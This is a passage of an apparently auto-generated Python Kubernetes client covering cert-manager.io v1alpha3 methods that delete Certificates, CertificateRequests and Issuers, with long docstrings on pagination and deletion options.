:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1StatusV2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_collection_namespaced_certificate_with_http_info(namespace, **kwargs) # noqa: E501
def delete_collection_namespaced_certificate_with_http_info(self, namespace, **kwargs): # noqa: E501
"""delete_collection_namespaced_certificate # noqa: E501
delete collection of Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_collection_namespaced_certificate_with_http_info(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1StatusV2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'namespace',
'pretty',
'_continue',
'field_selector',
'label_selector',
'limit',
'resource_version',
'resource_version_match',
'timeout_seconds'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_collection_namespaced_certificate" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `delete_collection_namespaced_certificate`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if '_continue' in local_var_params and local_var_params['_continue'] is not None: # noqa: E501
query_params.append(('continue', local_var_params['_continue'])) # noqa: E501
if 'field_selector' in local_var_params and local_var_params['field_selector'] is not None: # noqa: E501
query_params.append(('fieldSelector', local_var_params['field_selector'])) # noqa: E501
if 'label_selector' in local_var_params and local_var_params['label_selector'] is not None: # noqa: E501
query_params.append(('labelSelector', local_var_params['label_selector'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
if 'resource_version_match' in local_var_params and local_var_params['resource_version_match'] is not None: # noqa: E501
query_params.append(('resourceVersionMatch', local_var_params['resource_version_match'])) # noqa: E501
if 'timeout_seconds' in local_var_params and local_var_params['timeout_seconds'] is not None: # noqa: E501
query_params.append(('timeoutSeconds', local_var_params['timeout_seconds'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificates', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1StatusV2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_collection_namespaced_certificate_request(self, namespace, **kwargs): # noqa: E501
"""delete_collection_namespaced_certificate_request # noqa: E501
delete collection of CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_collection_namespaced_certificate_request(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1StatusV2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_collection_namespaced_certificate_request_with_http_info(namespace, **kwargs) # noqa: E501
def delete_collection_namespaced_certificate_request_with_http_info(self, namespace, **kwargs): # noqa: E501
"""delete_collection_namespaced_certificate_request # noqa: E501
delete collection of CertificateRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_collection_namespaced_certificate_request_with_http_info(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1StatusV2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'namespace',
'pretty',
'_continue',
'field_selector',
'label_selector',
'limit',
'resource_version',
'resource_version_match',
'timeout_seconds'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_collection_namespaced_certificate_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `delete_collection_namespaced_certificate_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if '_continue' in local_var_params and local_var_params['_continue'] is not None: # noqa: E501
query_params.append(('continue', local_var_params['_continue'])) # noqa: E501
if 'field_selector' in local_var_params and local_var_params['field_selector'] is not None: # noqa: E501
query_params.append(('fieldSelector', local_var_params['field_selector'])) # noqa: E501
if 'label_selector' in local_var_params and local_var_params['label_selector'] is not None: # noqa: E501
query_params.append(('labelSelector', local_var_params['label_selector'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
if 'resource_version_match' in local_var_params and local_var_params['resource_version_match'] is not None: # noqa: E501
query_params.append(('resourceVersionMatch', local_var_params['resource_version_match'])) # noqa: E501
if 'timeout_seconds' in local_var_params and local_var_params['timeout_seconds'] is not None: # noqa: E501
query_params.append(('timeoutSeconds', local_var_params['timeout_seconds'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/certificaterequests', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1StatusV2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_collection_namespaced_issuer(self, namespace, **kwargs): # noqa: E501
"""delete_collection_namespaced_issuer # noqa: E501
delete collection of Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_collection_namespaced_issuer(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1StatusV2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_collection_namespaced_issuer_with_http_info(namespace, **kwargs) # noqa: E501
def delete_collection_namespaced_issuer_with_http_info(self, namespace, **kwargs): # noqa: E501
"""delete_collection_namespaced_issuer # noqa: E501
delete collection of Issuer # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_collection_namespaced_issuer_with_http_info(namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server, the server will respond with a 410 ResourceExpired error together with a continue token. If the client needs a consistent list, it must restart their list without the continue field. Otherwise, the client may send another list request with the token received with the 410 error, the server will respond with a list starting from the next key, but from the latest snapshot, which is inconsistent from the previous list results - objects that are created, modified, or deleted after the first list request will be included in the response, as long as their keys are after the \"next key\". This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str resource_version: resourceVersion sets a constraint on what resource versions a request may be served from. See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param str resource_version_match: resourceVersionMatch determines how resourceVersion is applied to list calls. It is highly recommended that resourceVersionMatch be set for list calls where resourceVersion is set See https://kubernetes.io/docs/reference/using-api/api-concepts/#resource-versions for details. Defaults to unset
:param int timeout_seconds: Timeout for the list/watch call. This limits the duration of the call, regardless of any activity or inactivity.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1StatusV2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'namespace',
'pretty',
'_continue',
'field_selector',
'label_selector',
'limit',
'resource_version',
'resource_version_match',
'timeout_seconds'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_collection_namespaced_issuer" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `delete_collection_namespaced_issuer`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if '_continue' in local_var_params and local_var_params['_continue'] is not None: # noqa: E501
query_params.append(('continue', local_var_params['_continue'])) # noqa: E501
if 'field_selector' in local_var_params and local_var_params['field_selector'] is not None: # noqa: E501
query_params.append(('fieldSelector', local_var_params['field_selector'])) # noqa: E501
if 'label_selector' in local_var_params and local_var_params['label_selector'] is not None: # noqa: E501
query_params.append(('labelSelector', local_var_params['label_selector'])) # noqa: E501
if 'limit' in local_var_params and local_var_params['limit'] is not None: # noqa: E501
query_params.append(('limit', local_var_params['limit'])) # noqa: E501
if 'resource_version' in local_var_params and local_var_params['resource_version'] is not None: # noqa: E501
query_params.append(('resourceVersion', local_var_params['resource_version'])) # noqa: E501
if 'resource_version_match' in local_var_params and local_var_params['resource_version_match'] is not None: # noqa: E501
query_params.append(('resourceVersionMatch', local_var_params['resource_version_match'])) # noqa: E501
if 'timeout_seconds' in local_var_params and local_var_params['timeout_seconds'] is not None: # noqa: E501
query_params.append(('timeoutSeconds', local_var_params['timeout_seconds'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# Authentication setting
auth_settings = ['BearerToken'] # noqa: E501
return self.api_client.call_api(
'/apis/cert-manager.io/v1alpha3/namespaces/{namespace}/issuers', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1StatusV2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_namespaced_certificate(self, name, namespace, **kwargs): # noqa: E501
"""delete_namespaced_certificate # noqa: E501
delete a Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_namespaced_certificate(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:param V1DeleteOptionsV2 body:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1StatusV2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_namespaced_certificate_with_http_info(name, namespace, **kwargs) # noqa: E501
def delete_namespaced_certificate_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""delete_namespaced_certificate # noqa: E501
delete a Certificate # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_namespaced_certificate_with_http_info(name, namespace, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str name: name of the Certificate (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str dry_run: When present, indicates that modifications should not be persisted. An invalid or unrecognized dryRun directive will result in an error response and no further processing of the request. Valid values are: - All: all dry run stages will be processed
:param int grace_period_seconds: The duration in seconds before the object should be deleted. Value must be non-negative integer. The value zero indicates delete immediately. If this value is nil, the default grace period for the specified type will be used. Defaults to a per object value if not specified. zero means delete immediately.
:param bool orphan_dependents: Deprecated: please use the PropagationPolicy, this field will be deprecated in 1.7. Should the dependent objects be orphaned. If true/false, the \"orphan\" finalizer will be added to/removed from the object's finalizers list. Either this field or PropagationPolicy may be set, but not both.
:param str propagation_policy: Whether and how garbage collection will be performed. Either this field or OrphanDependents may be set, but not both. The default policy is decided by the existing finalizer set in the metadata.finalizers and the resource-specific default policy. Acceptable values are: 'Orphan' - orphan the dependents; 'Background' - allow the garbage collector to delete the dependents in the background; 'Foreground' - a cascading policy that deletes all dependents in the foreground.
:param V1DeleteOptionsV2 body:
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1StatusV2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'name',
'namespace',
'pretty',
'dry_run',
'grace_period_seconds',
'orphan_dependents',
'propagation_policy',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_namespaced_certificate" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'name' is set
if self.api_client.client_side_validation and ('name' not in local_var_params or # noqa: E501
local_var_params['name'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `name` when calling `delete_namespaced_certificate`") # noqa: E501
# verify the required parameter 'namespace' is set
if self.api_client.client_side_validation and ('namespace' not in local_var_params or # noqa: E501
local_var_params['namespace'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `namespace` when calling `delete_namespaced_certificate`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in local_var_params:
path_params['name'] = local_var_params['name'] # noqa: E501
if 'namespace' in local_var_params:
path_params['namespace'] = local_var_params['namespace'] # noqa: E501
query_params = []
if 'pretty' in local_var_params and local_var_params['pretty'] is not None: # noqa: E501
query_params.append(('pretty', local_var_params['pretty'])) # noqa: E501
if 'dry_run' in local_var_params and local_var_params['dry_run'] is not None: # noqa: E501
query_params.append(('dryRun', local_var_params['dry_run'])) # noqa: E501
if 'grace_period_seconds' in local_var_params and local_var_params['grace_period_seconds'] is not None: # noqa: E501
query_params.append(('gracePeriodSeconds', local_var_params['grace_period_seconds'])) # noqa: E501
if 'orphan_dependents' in local_var_params and local_var_params['orphan_dependents'] is not None: # noqa: E501
query_params.append(('orphanDependents', local_var_params['orphan_dependents'])) # noqa: E501
if 'propagation_policy' in local_var_params and local_var_params['propagation_policy'] is not None: # noqa: E501
query_params.append(('propagationPolicy', local_var_params['propagation_policy'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/yaml']) # noqa: E501
